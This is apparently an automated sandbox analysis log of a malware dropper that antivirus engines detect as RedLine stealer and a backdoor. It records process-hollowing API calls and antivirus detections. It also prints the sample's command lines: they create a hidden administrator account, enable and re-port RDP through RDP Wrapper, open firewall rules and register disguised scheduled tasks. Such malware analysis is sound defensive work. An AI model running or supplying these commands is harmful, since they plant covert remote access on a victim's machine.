 status_code: 0x00000000
process_identifier: 3716
process_handle: 0x000002c0
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3828
process_handle: 0x00000104
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3828
process_handle: 0x00000104
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3900
process_handle: 0x000002a4
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3900
process_handle: 0x000002a4
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3964
process_handle: 0x000002b0
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3964
process_handle: 0x000002b0
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 4028
process_handle: 0x000002c8
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 4028
process_handle: 0x000002c8
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 4092
process_handle: 0x0000013c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 4092
process_handle: 0x0000013c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2700
process_handle: 0x0000026c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2700
process_handle: 0x0000026c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3092
process_handle: 0x000002a0
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3092
process_handle: 0x000002a0
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3760
process_handle: 0x0000038c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3760
process_handle: 0x0000038c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3916
process_handle: 0x000002fc
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3916
process_handle: 0x000002fc
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3408
process_handle: 0x00000104
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3408
process_handle: 0x00000104
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3668
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3668
process_handle: 0x000002bc
1 0 0
cmdline net localgroup "Remote Desktop Users" ENWbXBorgA /add
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" 2>nul
cmdline net user ENWbXBorgA hKztsHIGxo /add
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
cmdline reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ENWbXBorgA /t REG_DWORD /d "00000000" /f
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
cmdline reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
cmdline sc queryex "TermService"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline wmic group where sid="S-1-5-32-555" get name /value
cmdline fsutil dirty query C:
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
cmdline reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
cmdline reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
cmdline reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
cmdline wusa.exe /quiet
cmdline reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline net localgroup Administrators ENWbXBorgA /add
cmdline wmic group where sid="S-1-5-32-544" get name /value
cmdline netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
cmdline C:\Windows\system32\cmd.exe /c "C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat ENWbXBorgA hKztsHIGxo"
cmdline "C:\Windows\System32\wusa.exe" /quiet
cmdline net accounts /maxpwage:unlimited
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
cmdline ping 127.0.0.1 -n 30
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
buffer Buffer with sha1: b0bd3cbdf9d37a00eb1a09466ad9f8a9e0a9b9ff
buffer Buffer with sha1: d14f54e5679fad2a8173f5ef47be5afa649dca41
buffer Buffer with sha1: c445eaf6f8fd93746fc3d3374d7b653f13ab5911
cmdline net localgroup Administrators ENWbXBorgA /add
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 413696
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b0000
process_handle: 0x0000016c
1 0 0

NtProtectVirtualMemory

 process_identifier: 1376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1966080
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
process_handle: 0x000001f4
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 122880
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001c0000
process_handle: 0x00000204
1 0 0
reg_key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll reg_value %ProgramFiles%\RDP Wrapper\rdpwrap.dll
cmdline netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
cmdline netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: ÿÿÿÿ[ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ`ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿû~(ü~Pý~€›mèÿÿ jHâý~±
base_address: 0x7efde000
process_identifier: 1852
process_handle: 0x00000204
1 1 0
DrWeb BAT.Drop.2756
ESET-NOD32 a variant of Win32/Packed.7zip.CP suspicious
Avast Win32:Malware-gen
Rising Trojan.HiddenRun/SFX!1.D57B (CLASSIC)
Zillya Backdoor.Agent.Win32.79977
Ikarus Trojan-Spy.RedLineStealer
Jiangmin Trojan.Alien.jp
Antiy-AVL Trojan/Generic.ASMalwS.332AC76
Gridinsoft Trojan.Win32.Agent.oa!s1
Microsoft Program:Win32/Wacapew.C!ml
Fortinet W32/Agent.ACXU!tr
AVG Win32:Malware-gen
Process injection Process 2312 called NtSetContextThread to modify thread in remote process 2648
Process injection Process 2912 called NtSetContextThread to modify thread in remote process 1376
Process injection Process 1424 called NtSetContextThread to modify thread in remote process 1852
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 5963740
registers.edi: 0
registers.eax: 6114119
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000170
process_identifier: 2648
1 0 0

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 6290364
registers.edi: 0
registers.eax: 6455306
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000016c
process_identifier: 1376
1 0 0

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 1703656
registers.edi: 0
registers.eax: 1932866
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 1852
1 0 0
Process injection Process 1944 resumed a thread in remote process 2420
Process injection Process 1944 resumed a thread in remote process 456
Process injection Process 1944 resumed a thread in remote process 2948
Process injection Process 2648 resumed a thread in remote process 2440
Process injection Process 2648 resumed a thread in remote process 2496
Process injection Process 2648 resumed a thread in remote process 1428
Process injection Process 2648 resumed a thread in remote process 2632
Process injection Process 2648 resumed a thread in remote process 732
Process injection Process 2648 resumed a thread in remote process 1516
Process injection Process 2648 resumed a thread in remote process 2792
Process injection Process 2648 resumed a thread in remote process 2320
Process injection Process 2648 resumed a thread in remote process 3160
Process injection Process 2648 resumed a thread in remote process 3304
Process injection Process 2648 resumed a thread in remote process 3452
Process injection Process 2648 resumed a thread in remote process 3652
Process injection Process 2648 resumed a thread in remote process 3716
Process injection Process 2648 resumed a thread in remote process 3828
Process injection Process 2648 resumed a thread in remote process 3900
Process injection Process 2648 resumed a thread in remote process 3964
Process injection Process 2648 resumed a thread in remote process 4028
Process injection Process 2648 resumed a thread in remote process 4092
Process injection Process 2648 resumed a thread in remote process 2700
Process injection Process 2648 resumed a thread in remote process 3092
Process injection Process 2648 resumed a thread in remote process 3760
Process injection Process 2648 resumed a thread in remote process 3916
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2420
1 0 0

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 456
1 0 0

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000380
suspend_count: 1
process_identifier: 2440
1 0 0

NtResumeThread

 thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 2496
1 0 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 1428
1 0 0

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

 thread_handle: 0x00000380
suspend_count: 1
process_identifier: 732
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 1516
1 0 0

NtResumeThread

 thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2792
1 0 0

NtResumeThread

 thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 2320
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2320
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 3160
1 0 0

NtResumeThread

 thread_handle: 0x00000388
suspend_count: 1
process_identifier: 3304
1 0 0

NtResumeThread

 thread_handle: 0x000002c0
suspend_count: 1
process_identifier: 3452
1 0 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 3652
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 3716
1 0 0

NtResumeThread

 thread_handle: 0x000002b0
suspend_count: 1
process_identifier: 3828
1 0 0

NtResumeThread

 thread_handle: 0x000002c8
suspend_count: 1
process_identifier: 3900
1 0 0

NtResumeThread

 thread_handle: 0x0000013c
suspend_count: 1
process_identifier: 3964
1 0 0

NtResumeThread

 thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 4028
1 0 0

NtResumeThread

 thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 4092
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2700
1 0 0

NtResumeThread

 thread_handle: 0x00000274
suspend_count: 1
process_identifier: 3092
1 0 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 3760
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000110
suspend_count: 1
process_identifier: 1764
1 0 0

CreateProcessInternalW

 thread_identifier: 2480
thread_handle: 0x0000031c
process_identifier: 2024
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c cmd < Orlo.vst
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634176 (CREATE_DEFAULT_ERROR_MODE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000324
1 1 0

CreateProcessInternalW

 thread_identifier: 2236
thread_handle: 0x00000088
process_identifier: 1944
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: cmd
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 3068
thread_handle: 0x0000008c
process_identifier: 1744
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 656
thread_handle: 0x00000090
process_identifier: 2420
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
track: 1
command_line: Pensai.exe.com T
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2420
1 0 0

CreateProcessInternalW

 thread_identifier: 2176
thread_handle: 0x00000094
process_identifier: 2156
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 532
thread_handle: 0x00000090
process_identifier: 456
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
track: 1
command_line: Vacillavo.exe.com K
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 456
1 0 0

CreateProcessInternalW

 thread_identifier: 1788
thread_handle: 0x0000008c
process_identifier: 2756
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 1172
thread_handle: 0x00000090
process_identifier: 2948
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
track: 1
command_line: Naso.exe.com B
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

 thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2948
1 0 0

CreateProcessInternalW

 thread_identifier: 2560
thread_handle: 0x00000094
process_identifier: 204
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 30
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 1080
thread_handle: 0x0000012c
process_identifier: 1612
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

 thread_identifier: 1376
thread_handle: 0x00000128
process_identifier: 1088
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000012c
1 1 0

CreateProcessInternalW

 thread_identifier: 2532
thread_handle: 0x00000128
process_identifier: 2312
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com T
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000012c
1 1 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2312
1 0 0

CreateProcessInternalW

 thread_identifier: 1276
thread_handle: 0x00000170
process_identifier: 2648
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000016c
1 1 0

NtGetContextThread

 thread_handle: 0x00000170
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 413696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x005b0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000016c
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x005b0000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ[ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 5963740
registers.edi: 0
registers.eax: 6114119
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000170
process_identifier: 2648
1 0 0

CreateProcessInternalW

 thread_identifier: 1820
thread_handle: 0x0000012c
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com K
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

 thread_identifier: 1600
thread_handle: 0x0000016c
process_identifier: 1376
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001f4
1 1 0

NtGetContextThread

 thread_handle: 0x0000016c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1376
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x00600000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001f4
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00600000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ`ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 6290364
registers.edi: 0
registers.eax: 6455306
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000016c
process_identifier: 1376
1 0 0

CreateProcessInternalW

 thread_identifier: 108
thread_handle: 0x0000012c
process_identifier: 1424
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com B
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000130
1 1 0

CreateProcessInternalW

 thread_identifier: 328
thread_handle: 0x000001fc
process_identifier: 1852
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000204
1 1 0

NtGetContextThread

 thread_handle: 0x000001fc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 122880
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x001c0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x001c0000
process_identifier: 1852
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿû~(ü~Pý~€›mèÿÿ jHâý~±
base_address: 0x7efde000
process_identifier: 1852
process_handle: 0x00000204
1 1 0

NtSetContextThread

 registers.eip: 2007957956
registers.esp: 1703656
registers.edi: 0
registers.eax: 1932866
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 1852
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 204
1 0 0

NtResumeThread

 thread_handle: 0x00000178
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

 thread_handle: 0x000001e8
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

 thread_handle: 0x00000224
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

 thread_handle: 0x000003c8
suspend_count: 1
process_identifier: 1852
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

 thread_identifier: 1108
thread_handle: 0x00000380
process_identifier: 2440
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000388
1 1 0

NtResumeThread

 thread_handle: 0x00000380
suspend_count: 1
process_identifier: 2440
1 0 0

CreateProcessInternalW

 thread_identifier: 2072
thread_handle: 0x0000026c
process_identifier: 2496
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

 thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 2496
1 0 0

CreateProcessInternalW

 thread_identifier: 2356
thread_handle: 0x00000104
process_identifier: 1428
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 1428
1 0 0

CreateProcessInternalW

 thread_identifier: 2092
thread_handle: 0x000002b8
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\wusa.exe
track: 1
command_line: "C:\Windows\System32\wusa.exe" /quiet
filepath_r: C:\Windows\System32\wusa.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0